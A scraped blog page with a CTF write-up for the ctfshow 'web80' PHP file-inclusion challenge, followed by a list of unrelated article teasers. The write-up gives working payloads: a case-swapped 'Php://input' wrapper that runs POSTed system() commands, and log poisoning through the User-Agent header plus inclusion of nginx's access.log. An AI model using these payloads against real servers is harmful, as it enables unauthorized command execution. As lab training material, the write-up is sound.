[ctfshow web入门] web80

article/2025/8/2 23:02:57

信息收集

过滤了phpdata

if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

在这里插入图片描述

日志绕过

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

在这里插入图片描述

web79    目录    web81


http://www.hkcw.cn/article/qUFEKJCyZX.shtml

相关文章

移动安全Android——客户端数据安全

移动安全Android——客户端数据安全

本地文件权限配置 测试流程 &#xff08;1&#xff09;手机运行待测APP应用&#xff0c;adb执行命令找到APP包名 adb shell dumpsys activity top|findstr ACTIVITY &#xff08;2&#xff09;adb shell 进入设备&#xff0c;以Root权限进入/data/data/package包名目录下 c…
阅读更多...
AI生态警报:MCP协议风险与应对指南(下)——MCP Host安全

AI生态警报:MCP协议风险与应对指南(下)——MCP Host安全

AI生态警报&#xff1a;MCP协议风险与应对指南&#xff08;上&#xff09;——架构与供应链风险https://blog.csdn.net/WangsuSecurity/article/details/148335401?sharetypeblogdetail&sharerId148335401&sharereferPC&sharesourceWangsuSecurity&spm1011.24…
阅读更多...
机房网络设备操作安全管理制度

机房网络设备操作安全管理制度

该制度围绕机房网络设备操作安全,规定账号实行系统管理员、操作管理员、一般用户三级分级管理,遵循最小授权和权限分割原则,账号需实名制、禁止共享及转借,密码设置需至少 8 位、3 种字符组合且每 3 个月修改一次;高危指令执行需上级审批、双人核查,远程登录需限制权限、…
阅读更多...
Root权限:解锁Android的终极力量

Root权限:解锁Android的终极力量

Root后的功能扩展 Root后可以实现的高级功能&#xff0c;如系统级备份、自定义ROM、性能优化、广告屏蔽等。 Root的风险与防范 讨论Root可能导致的安全问题&#xff0c;如恶意软件攻击、系统不稳定、保修失效等&#xff0c;提出降低风险的建议&#xff0c;如使用可信工具、备…
阅读更多...
亚马逊数据采集软件完全指南:从工具原理到实战落地

亚马逊数据采集软件完全指南:从工具原理到实战落地

亚马逊数据采集软件有哪些&#xff1f;在数字化商业浪潮中&#xff0c;亚马逊作为全球电商巨头&#xff0c;其平台上蕴含着海量的数据宝藏。对于卖家、品牌商以及市场分析师而言&#xff0c;精准获取和分析这些数据&#xff0c;成为了在激烈竞争中脱颖而出的关键。从产品定价的…
阅读更多...
免费高清多功能录屏软件推荐

免费高清多功能录屏软件推荐

软件介绍 今天为大家介绍一款功能全面的免费录屏软件 - 云豹录屏大师。 录屏格式支持 这款软件特别强大&#xff0c;能够录制多种常见视频格式&#xff0c;包括MP4、AVI、WMV等格式&#xff0c;满足不同场景的录制需求。 高帧率支持 软件最高支持120帧的录制效果&#xff0…
阅读更多...
【交通 Traffic Transformer】同一篇文章,内容排版稍有不同 | 交通预测模型中,Transformer相比传统GCN模型有何优势?

【交通 Traffic Transformer】同一篇文章,内容排版稍有不同 | 交通预测模型中,Transformer相比传统GCN模型有何优势?

冰冻三尺,非一日之寒。 前情提要: 【Traffic Transformer】将 Transformer 应用于 交通预测领域中 | 动态和分层交通时空特征 | 时空模型比纯时间模型的性能要好得多 | 定义不好的相邻矩阵会损害模型Transformer相比传统GCN模型在交通预测中具有三大核心优势: 1、动态空间依…
阅读更多...
docker-compose搭建prometheus以及grafana

docker-compose搭建prometheus以及grafana

1. 什么是 Prometheus&#xff1f; Prometheus 是一个开源的系统监控和告警工具&#xff0c;由 SoundCloud 于 2012 年开始开发&#xff0c;现为 CNCF&#xff08;Cloud Native Computing Foundation&#xff09;项目之一。它特别适合云原生环境和容器编排系统&#xff08;如 …
阅读更多...
AI科技前沿动态:5.26 - 5.30 一周速览

AI科技前沿动态:5.26 - 5.30 一周速览

目录 ⭐ 本周热点&#x1f4a1; 阿里巴巴开源自主搜索 AI 智能体 WebAgent&#x1f4a1; 我国首个软件开发 AI 智能体标准发布&#xff0c;20 余家巨头联手参编&#x1f4a1; 刚刚&#xff0c;新版DeepSeek-R1正式开源&#xff01;直逼o3编程强到离谱&#xff0c;一手实测来了 …
阅读更多...
【google 论文】Titans: Learning to Memorize at Test Time

【google 论文】Titans: Learning to Memorize at Test Time

核心思想与贡献&#xff1a; 这篇论文的核心贡献在于提出了一种新的神经网络长期记忆模块 (neural long-term memory module)&#xff0c;并基于此构建了一个名为 Titans 的新型系列架构。这个架构旨在克服现有模型&#xff08;如Transformers&#xff09;在处理超长序列和长期…
阅读更多...
VASP 教程:VASP 结合 Phonopy 计算硅的比热容

VASP 教程:VASP 结合 Phonopy 计算硅的比热容

VASP 全称为 Vienna Ab initio Simulation Package&#xff08;The VASP Manual - VASP Wiki&#xff09;是一个计算机程序&#xff0c;用于从第一性原理进行原子尺度材料建模&#xff0c;例如电子结构计算和量子力学分子动力学。 Phonopy&#xff08;Welcome to phonopy — Ph…
阅读更多...
企业数字化转型的7个难点

企业数字化转型的7个难点

数字化转型不是一个有始有终的项目&#xff0c;而是一个持续变革的过程&#xff0c;过程漫长&#xff0c;且险象环生。需要领导者带领企业从成功或不成功的经验里持续反思、持续学习。 近年来&#xff0c;以移动互联网、云计算、大数据、人工智能等为代表的新一代数字化技术正在…
阅读更多...
华为OD机试真题——简易内存池(2025A卷:200分)Java/python/JavaScript/C++/C/GO最佳实现

华为OD机试真题——简易内存池(2025A卷:200分)Java/python/JavaScript/C++/C/GO最佳实现

2025 A卷 200分 题型 本文涵盖详细的问题分析、解题思路、代码实现、代码详解、测试用例以及综合分析; 并提供Java、python、JavaScript、C++、C语言、GO六种语言的最佳实现方式! 本文收录于专栏:《2025华为OD真题目录+全流程解析/备考攻略/经验分享》 华为OD机试真题《简易…
阅读更多...
mysql-mysql源码本地调试

mysql-mysql源码本地调试

前言 先进行mysql源码本地编译&#xff1a;mysql源码本地编译 1.本地调试 这里以macbook为例 1.使用vscode打开mysql源码 2.创建basedir目录、数据目录、配置文件目录、配置文件 cd /Users/test/ mkdir mysqldir //创建数据目录和配置目录 cd mysqldir mkdir conf data …
阅读更多...
华为OD机试真题——查找接口成功率最优时间段(2025A卷:100分)Java/python/JavaScript/C/C++/GO最佳实现

华为OD机试真题——查找接口成功率最优时间段(2025A卷:100分)Java/python/JavaScript/C/C++/GO最佳实现

2025 A卷 100分 题型 本专栏内全部题目均提供Java、python、JavaScript、C、C++、GO六种语言的最佳实现方式; 并且每种语言均涵盖详细的问题分析、解题思路、代码实现、代码详解、3个测试用例以及综合分析; 本文收录于专栏:《2025华为OD真题目录+全流程解析+备考攻略+经验分…
阅读更多...
硬件I2C和软件I2C的区别

硬件I2C和软件I2C的区别

硬件I2C和软件I2C的区别 一、硬件I2C 1、硬件IC的局限性及学习意义 尽管硬件IC外设在STM32等微控制器中提供了标准化的通信支持&#xff0c;但在实际应用中&#xff0c;其稳定性可能存在问题。例如&#xff0c;某些情况下外设会因事件检测异常而进入死锁状态&#xff0c;仅能…
阅读更多...
PyCharm接入DeepSeek,实现高效AI编程

PyCharm接入DeepSeek,实现高效AI编程

介绍本土AI工具DeepSeek如何结合PyCharm同样实现该功能。 一 DeepSeek API申请 首先进入DeepSeek官网&#xff1a;DeepSeek 官网 接着点击右上角的 “API 开放平台“ 然后点击API keys 创建好的API key&#xff0c;记得复制保存好 二 pycharm 接入deepseek 首先打开PyCh…
阅读更多...
大模型-attention汇总解析之-MQA

大模型-attention汇总解析之-MQA

MQA&#xff0c;即 “Multi-Query Attention”&#xff0c;是减少 KV Cache 的一次的一种大胆尝试&#xff0c;首次提出自《Fast Transformer Decoding: One Write-Head is All You Need》&#xff0c; 在2019 年减少 KV Cache 就已经是研究人员非常关注的一个课题了。MQA 的思…
阅读更多...
华为OD机试真题——游戏分组王者荣耀(2025A卷:100分)Java/python/JavaScript/C/C++/GO最佳实现

华为OD机试真题——游戏分组王者荣耀(2025A卷:100分)Java/python/JavaScript/C/C++/GO最佳实现

2025 A卷 100分 题型 本专栏内全部题目均提供Java、python、JavaScript、C、C++、GO六种语言的最佳实现方式; 并且每种语言均涵盖详细的问题分析、解题思路、代码实现、代码详解、3个测试用例以及综合分析; 本文收录于专栏:《2025华为OD真题目录+全流程解析+备考攻略+经验分…
阅读更多...
主流 AI IDE 之一的 Windsurf 使用入门

主流 AI IDE 之一的 Windsurf 使用入门

一、Windsurf 的常见入门界面 以上是本次展示Windsurf版本信息。 1.1 个人配置中心 1.2 AI 助手快捷设置 1.3 使用额度查看页面 1.4 智能助手 Windsurf 编辑器中 AI 助手名称 &#xff1a;Cascade 。打开 Cascade 窗口&#xff0c;开始聊天就可以了。方框里有写和聊两种状态锁…
阅读更多...
推荐文章

Copyright @ 2022~2023